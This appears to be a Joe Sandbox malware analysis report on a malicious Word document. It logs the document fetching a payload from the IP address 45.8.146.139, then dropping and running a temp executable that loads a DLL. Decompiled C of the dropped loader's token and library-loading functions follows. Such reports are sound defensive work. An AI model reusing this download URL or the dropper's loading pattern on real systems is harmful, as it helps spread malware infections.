Data Raw:	01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 dc 52 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 18:08:29.353974104 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:08:29.457240105 CEST	80	49738	45.8.146.139	192.168.2.3
Aug 11, 2022 18:08:29.457406044 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:08:29.457667112 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:08:29.561008930 CEST	80	49738	45.8.146.139	192.168.2.3
Aug 11, 2022 18:08:29.575757980 CEST	80	49738	45.8.146.139	192.168.2.3
Aug 11, 2022 18:08:29.575900078 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:08:34.581047058 CEST	80	49738	45.8.146.139	192.168.2.3
Aug 11, 2022 18:08:34.581135988 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:11.599394083 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:12.004218102 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:12.707479000 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:14.004400015 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:16.410872936 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:21.223809004 CEST	49738	80	192.168.2.3	45.8.146.139
Aug 11, 2022 18:10:30.834017038 CEST	49738	80	192.168.2.3	45.8.146.139

HTTP Request Dependency Graph

45.8.146.139

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49738	45.8.146.139	80	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 18:08:29.457667112 CEST	1163	OUT	GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.8.146.139 Connection: Keep-Alive
Aug 11, 2022 18:08:29.575757980 CEST	1163	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 16:08:29 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 X-Powered-By: PHP/7.2.34 Content-Length: 201 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 72 6d 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "rm" was not found on this server.</p></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXEPID: 2240, Parent PID: 756

General

Target ID:	0
Start time:	18:08:18
Start date:	11/08/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xcd0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rECA2.tmp.exePID: 5584, Parent PID: 2240

General

Target ID:	2
Start time:	18:08:29
Start date:	11/08/2022
Path:	C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1
Imagebase:	0x1000000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WmiPrvSE.exePID: 5584, Parent PID: 756

General

Target ID:	25
Start time:	18:10:02
Start date:	11/08/2022
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff674600000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: __Unknown_Module_Name__

Declaration

Line	Content

Reset < >

Analysis Process: rECA2.tmp.exePID: 5584, Parent PID: 2240COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.8%
Total number of Nodes:	734
Total number of Limit Nodes:	7

Executed Functions

Function 01003F9E Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E01003F9E(intOrPtr _a4, intOrPtr* _a12, intOrPtr _a16) {
				void _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _t59;
				signed int _t61;
				signed int _t73;
				signed int _t74;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				void* _t98;
				void* _t101;
				intOrPtr* _t102;
				void* _t106;
				void* _t117;
				void* _t128;
				int _t129;
				intOrPtr _t130;
				void* _t131;
				void* _t132;
				struct HINSTANCE__* _t133;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x24;
				_t129 = 0;
				__imp__HeapSetInformation(0, 1, 0, 0, _t128, _t131, _t98);
				_v32 = 1;
				NtSetInformationProcess(0xffffffff, 0x22,  &_v32, 4); // executed
				_t102 = _a12;
				_t117 = _t102 + 2;
				goto L1;
				L4:
				_t101 = LocalAlloc(0x40, _t132 + _t132);
				if(_t101 == 0) {
					L36:
					if( *0x10083c8 == 1) {
						FreeConsole();
					}
					ExitProcess(_t129);
				}
				if(E01001EA1(_t101, _t132, _a12) >= 0) {
					_t106 = _t101;
					if(E0100564D(_t106,  &_v56,  &_v68,  &_v48,  &_v52) != 0) {
						_t146 = _v56 & 0x00000001;
						if((_v56 & 0x00000001) == 0) {
							__eflags = _v56 & 0x00000002;
							if(__eflags == 0) {
								SetErrorMode(0x8001); // executed
								_v56 = _v56 & 0x00000000;
								_push(_t106);
								_t73 = E010058CA(_v68,  &_v56); // executed
								_v40 = _t73;
								_t74 = E01005D14(_t73); // executed
								__eflags = _t74;
								if(__eflags == 0) {
									E0100371B( *0x10083cc, 0x403, _v56, L"requestedRunLevel");
								} else {
									_v48 = _v48 & 0x00000000;
									_v52 = _v52 & 0x00000000;
									_t81 = E01003C8D(_v56, __eflags, _v36, _v40,  &_v52, _t136 + 0x2c,  &_v48); // executed
									__eflags = _t81;
									if(_t81 != 0) {
										__eflags = _v48;
										if(_v48 != 0) {
											_t81 = _v48;
											_v40 = _v48;
										}
										E01003D9F(_t81, _v52);
										_t84 = E01005C0E();
										_t111 = _t129;
										_v56 = _t84;
										_t85 = E01003F44(_t101, _t129, _v52, __eflags, _v36);
										__eflags = _t85;
										if(_t85 != 0) {
											E01003EAA( *((intOrPtr*)(_t136 + 0x34)), _v56, _t111, _v40, _a16);
										}
										_t86 = _v56;
										__eflags = _t86;
										if(_t86 != 0) {
											 *0x100b050(_t86);
										}
										FreeLibrary(_v52);
									}
									LocalFree(_v48);
								}
								_t130 =  *((intOrPtr*)(_t136 + 0x2c));
								__eflags = _t130 - 0xffffffff;
								if(_t130 != 0xffffffff) {
									__eflags = _v44;
									if(_v44 != 0) {
										__imp__DeactivateActCtx(0, _v44);
									}
									__imp__ReleaseActCtx(_t130);
								}
							} else {
								_t90 = E01003F44(_t101, _t129, 0, __eflags, L"localserver");
								__eflags = _t90;
								if(_t90 != 0) {
									E010035F3(_t90, _v68);
								}
							}
						} else {
							if(E01003F44(_t101, _t129, 0, _t146, _v68) != 0) {
								E01003E1D(_v68, _v52);
							}
						}
						if(_t133 != 0) {
							FreeLibrary(_t133);
						}
						_t129 = 0;
					}
				}
				LocalFree(_t101);
				goto L36;
				L1:
				_t59 =  *_t102;
				_t102 = _t102 + 2;
				if(_t59 != 0) {
					goto L1;
				} else {
					 *0x10083cc = _a4;
					 *0x10083c8 = 0;
					_t132 = (_t102 - _t117 >> 1) + 1;
					_t61 = E01006A0B(_t102 - _t117 >> 1);
					if(_t61 == 0) {
						__imp__AttachConsole(0xffffffff);
						asm("sbb eax, eax");
						 *0x10083c8 =  ~_t61 + 2;
					}
					goto L4;
				}
			}

0x01003fa6
0x01003fac
0x01003fb5
0x01003fc1
0x01003fca
0x01003fd0
0x01003fd3
0x01003fd3
0x01004013
0x0100401f
0x01004023
0x0100420f
0x01004216
0x01004218
0x01004218
0x0100421f
0x0100421f
0x01004037
0x01004041
0x01004059
0x01004094
0x01004099
0x010040c2
0x010040c7
0x010040f2
0x010040f8
0x01004101
0x01004106
0x0100410d
0x01004111
0x01004116
0x01004118
0x010041d3
0x0100411e
0x01004126
0x0100412b
0x01004148
0x0100414d
0x0100414f
0x01004151
0x01004156
0x01004158
0x0100415c
0x0100415c
0x01004164
0x01004169
0x01004176
0x01004178
0x0100417c
0x01004181
0x01004183
0x01004195
0x01004195
0x0100419a
0x0100419e
0x010041a0
0x010041a3
0x010041a3
0x010041ad
0x010041ad
0x010041b7
0x010041b7
0x010041d8
0x010041dc
0x010041df
0x010041e1
0x010041e6
0x010041ee
0x010041ee
0x010041f5
0x010041f5
0x010040c9
0x010040d2
0x010040d7
0x010040d9
0x010040e3
0x010040e3
0x010040d9
0x0100409b
0x010040aa
0x010040b8
0x010040b8
0x010040aa
0x010041fd
0x01004200
0x01004200
0x01004206
0x01004206
0x01004059
0x01004209
0x00000000
0x01003fd6
0x01003fd6
0x01003fd9
0x01003fdf
0x00000000
0x01003fe1
0x01003fe8
0x01003fed
0x01003ff3
0x01003ff6
0x01003ffd
0x01004001
0x01004009
0x0100400e
0x0100400e
0x00000000
0x01003ffd

APIs

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 01003FB5
NtSetInformationProcess.NTDLL(000000FF,00000022,?,00000004), ref: 01003FCA
AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 01004001
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 01004019
LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 01004076
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 01004088
SetErrorMode.KERNELBASE(00008001), ref: 010040F2
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 010041AD
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 010041B7
DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 010041EE
ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 010041F5

Part of subcall function 010035F3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 01003604
Part of subcall function 010035F3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(0100196C,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 01003620
Part of subcall function 010035F3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 01003638
Part of subcall function 010035F3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0100364D
Part of subcall function 010035F3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 0100368F
Part of subcall function 010035F3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 0100369C
Part of subcall function 010035F3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 010036A3
Part of subcall function 010035F3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,0100841C,?), ref: 010036C0
Part of subcall function 010035F3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 01003702
Part of subcall function 010035F3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 01003710

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 01004200
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 01004209
FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 01004218
ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0100421F

Strings

requestedRunLevel, xrefs: 010041CA
localserver, xrefs: 010040C9
WLDP.DLL, xrefs: 01004071
WldpIsAllowedEntryPoint, xrefs: 01004082

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWait
String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
API String ID: 3307762745-3890604504
Opcode ID: 55306b1d5c575e391a058c3207dc34f2d84567cd47daea520fa3750b63889513
Instruction ID: 8d387fba23879730b0678d62f7160992ffca3ae3c0a1ed8c4fcadc4d235f113f
Opcode Fuzzy Hash: 55306b1d5c575e391a058c3207dc34f2d84567cd47daea520fa3750b63889513
Instruction Fuzzy Hash: EC618E312083029FE723DF64C844AAB7BE5BF94714F044A2DFAD5A61D1CB35D90ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 01005D14 Relevance: 10.6, APIs: 7, Instructions: 88
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E01005D14(void* __ecx) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t18;
				void** _t22;
				char* _t25;
				signed int _t26;
				void* _t28;
				void* _t34;
				signed int _t35;
				signed int _t39;
				signed int _t41;

				_v8 =  *0x1008018 ^ _t39;
				_t18 =  &_v28;
				_t34 = 0;
				_t28 = __ecx;
				_v24 = 0;
				__imp__NtOpenProcessToken(0xffffffff, 8, _t18);
				_t35 = RtlNtStatusToDosError(_t18);
				if(_t35 > 0) {
					_t35 = _t35 & 0x0000ffff | 0x80070000;
					_t41 = _t35;
				}
				if(_t41 >= 0) {
					_t33 =  &_v24;
					_t26 = E01005C96(_v28,  &_v24); // executed
					_t35 = _t26;
					NtClose(_v28);
					_t34 = _v24;
				}
				_t37 =  !_t35 >> 0x1f;
				if( !_t35 >> 0x1f == 0 || _t34 != 0) {
					L15:
					return E01006160(_t37, _t28, _v8 ^ _t39, _t33, _t34, _t37);
				} else {
					if(_t28 != 0 && _t28 != 0xffffffff) {
						_t25 =  &_v20;
						__imp__QueryActCtxW(0x80000000, _t28, _t34, 5, _t25, 0xc, _t34);
						if(_t25 != 0) {
							_t34 = _v16;
						}
					}
					_t34 = _t34;
					if(_t34 == 0) {
						_t22 =  &_v24;
						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22);
						if(_t22 >= 0) {
							_v28 = 1;
							__imp__NtSetInformationToken(_v24, 0x18,  &_v28, 4);
							NtClose(_v24);
						}
					} else {
						if(_t34 != 0) {
							_t37 = 0;
						}
					}
					goto L15;
				}
			}

0x01005d23
0x01005d29
0x01005d2c
0x01005d33
0x01005d35
0x01005d38
0x01005d45
0x01005d49
0x01005d4e
0x01005d54
0x01005d54
0x01005d56
0x01005d5b
0x01005d5e
0x01005d66
0x01005d68
0x01005d6e
0x01005d6e
0x01005d73
0x01005d78
0x01005de8
0x01005dfa
0x01005d7e
0x01005d80
0x01005d8a
0x01005d97
0x01005d9f
0x01005da1
0x01005da1
0x01005d9f
0x01005da4
0x01005da7
0x01005db2
0x01005dbd
0x01005dc5
0x01005dcc
0x01005dd9
0x01005de2
0x01005de2
0x01005da9
0x01005dac
0x01005dae
0x01005dae
0x01005dac
0x00000000
0x01005da7

APIs

NtOpenProcessToken.NTDLL ref: 01005D38
RtlNtStatusToDosError.NTDLL ref: 01005D3F
NtClose.NTDLL(00000000), ref: 01005D68
QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 01005D97
NtOpenProcessToken.NTDLL ref: 01005DBD
NtSetInformationToken.NTDLL ref: 01005DD9
NtClose.NTDLL(?), ref: 01005DE2

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
String ID:
API String ID: 3674487995-0
Opcode ID: 2d3fe9e2826cfadf6b0c6792a925f3a1bf086fa4186dd36c942946a5e4c64399
Instruction ID: 1c389dc23ee9cafeda3914c6255579b4261cb0e8a37b7bf157e98621eefe3cc1
Opcode Fuzzy Hash: 2d3fe9e2826cfadf6b0c6792a925f3a1bf086fa4186dd36c942946a5e4c64399
Instruction Fuzzy Hash: E821A732A002199BEB72EBA8CD4DBBF7B78EF44711F110256EE94B71C0D6319905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01003A94 Relevance: 7.6, APIs: 5, Instructions: 85
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 01003AB5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 01003AC1
FormatMessageW.KERNELBASE(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 01003B20

Part of subcall function 01003938: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 01003968
Part of subcall function 01003938: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 0100396F
Part of subcall function 01003938: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 01003998
Part of subcall function 01003938: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 010039B3

RtlImageNtHeader.NTDLL(00000000), ref: 01003B41
SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 01003B79

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
String ID:
API String ID: 4162338769-0
Opcode ID: e7c00d7f7ca28bc05245eecc1ff5c0d4a757dc912c8075ef72a8d89c8dd3c822
Instruction ID: b46aa8e882745981644832bb16f56e8f0797e3e3a4559218e71f6fe91f88f0ef
Opcode Fuzzy Hash: e7c00d7f7ca28bc05245eecc1ff5c0d4a757dc912c8075ef72a8d89c8dd3c822
Instruction Fuzzy Hash: F121C4B06402186FF723DB258C49FFB76BDFBD4704F0040A9B689DA1C1DAB48E448760

Uniqueness

Uniqueness Score: -1.00%

Function 01005C96 Relevance: 4.6, APIs: 3, Instructions: 55
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E01005C96(void* __ecx, signed int* __edx) {
				char _v8;
				char _v12;
				char _v16;
				long _t10;
				signed short _t11;
				signed char _t14;
				signed int* _t19;
				signed short _t26;

				_v8 = 1;
				_t10 =  &_v8;
				_t19 = __edx;
				_t14 = 0;
				 *((intOrPtr*)(__edx)) = 0; // executed
				__imp__NtQueryInformationToken(__ecx, 0x12, _t10, 4,  &_v12); // executed
				if(_t10 >= 0) {
					if(_v8 == 2) {
						L5:
						_t14 = 1;
					} else {
						if(_v8 == 1) {
							_t10 =  &_v16;
							__imp__NtQueryInformationToken(__ecx, 0x14, _t10, 4,  &_v12);
							if(_t10 >= 0 && _v16 != 0) {
								goto L5;
							}
						}
					}
				}
				_t11 = RtlNtStatusToDosError(_t10);
				if(_t11 > 0) {
					_t11 = _t11 & 0x0000ffff | 0x80070000;
					_t26 = _t11;
				}
				if(_t26 >= 0) {
					 *_t19 = _t14 & 0x000000ff;
					return _t11;
				}
				return _t11;
			}

0x01005ca4
0x01005cae
0x01005cb1
0x01005cb6
0x01005cbb
0x01005cbd
0x01005cc5
0x01005ccb
0x01005cef
0x01005cef
0x01005ccd
0x01005cd1
0x01005cd9
0x01005ce0
0x01005ce8
0x00000000
0x00000000
0x01005ce8
0x01005cd1
0x01005ccb
0x01005cf2
0x01005cfa
0x01005cff
0x01005d04
0x01005d04
0x01005d06
0x01005d0b
0x00000000
0x01005d0b
0x01005d13

APIs

NtQueryInformationToken.NTDLL(00000000,00000012,00000001,00000004,?), ref: 01005CBD
NtQueryInformationToken.NTDLL(00000000,00000014,?,00000004,?), ref: 01005CE0
RtlNtStatusToDosError.NTDLL ref: 01005CF2

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: InformationQueryToken$ErrorStatus
String ID:
API String ID: 1049779487-0
Opcode ID: 95caab55e37d331473f9d4eb0cf75b627cb6d33d8936a905052c09f1bb142498
Instruction ID: 162cebc6b514c18f8959f769fcb25366167c1110a659d39aaf6a4777698dadf5
Opcode Fuzzy Hash: 95caab55e37d331473f9d4eb0cf75b627cb6d33d8936a905052c09f1bb142498
Instruction Fuzzy Hash: 43018071600209AFFB219E959D45BAABBEDEB40715F4041BAFA85E2180D2358A04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01003F00 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E01003F00() {
				signed int _v8;
				void _v44;
				void* __ebx;
				long _t10;
				long* _t13;
				void* _t16;
				void* _t17;
				void* _t18;
				signed int _t19;

				_v8 =  *0x1008018 ^ _t19;
				_t13 = 0;
				_t10 = NtQuerySystemInformation(0xa4,  &_v44, 0x20, 0); // executed
				if(_t10 >= 0 && (_v44 & 0x00000010) != 0) {
					_t13 = 1;
				}
				return E01006160(_t13, _t13, _v8 ^ _t19, _t16, _t17, _t18);
			}

0x01003f0f
0x01003f13
0x01003f21
0x01003f29
0x01003f31
0x01003f31
0x01003f43

APIs

NtQuerySystemInformation.NTDLL ref: 01003F21

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 4c8e0a795e57b92198a1e31e62745532dad60fcb4bedc75937a08f08fcf47813
Instruction ID: cf14b3f33f61c1fd6405eb2c258a314895589214eea58aab95204f1c63454806
Opcode Fuzzy Hash: 4c8e0a795e57b92198a1e31e62745532dad60fcb4bedc75937a08f08fcf47813
Instruction Fuzzy Hash: ABE02B34B0030C6FE711CFA48884BFEBBB8DB44214F14106AED81571C0D971A9049350

Uniqueness

Uniqueness Score: -1.00%

Function 01006580 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01006580() {

				SetUnhandledExceptionFilter(E01006530); // executed
				return 0;
			}

0x01006585
0x0100658d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006530), ref: 01006585

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ec35d0137913b6b01c764418964fcfd7daae2815b46ee9e8d6f19be24750133d
Instruction ID: 400a9fcd68b11c35f09fcbb8bbf896ad24ebd69e24c69202cd47fe2dd2c7ead6
Opcode Fuzzy Hash: ec35d0137913b6b01c764418964fcfd7daae2815b46ee9e8d6f19be24750133d
Instruction Fuzzy Hash: 099002F06652104AA6125BB1784D44675915A48967F414454B4CAC818DEA5751545611

Uniqueness

Uniqueness Score: -1.00%

Function 010058CA Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-1(?,00000000,00000000,00000000), ref: 010058EB
RtlSetSearchPathMode.NTDLL ref: 010058FA
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 01005916
GetFileAttributesW.KERNELBASE(?,?,?), ref: 0100599C
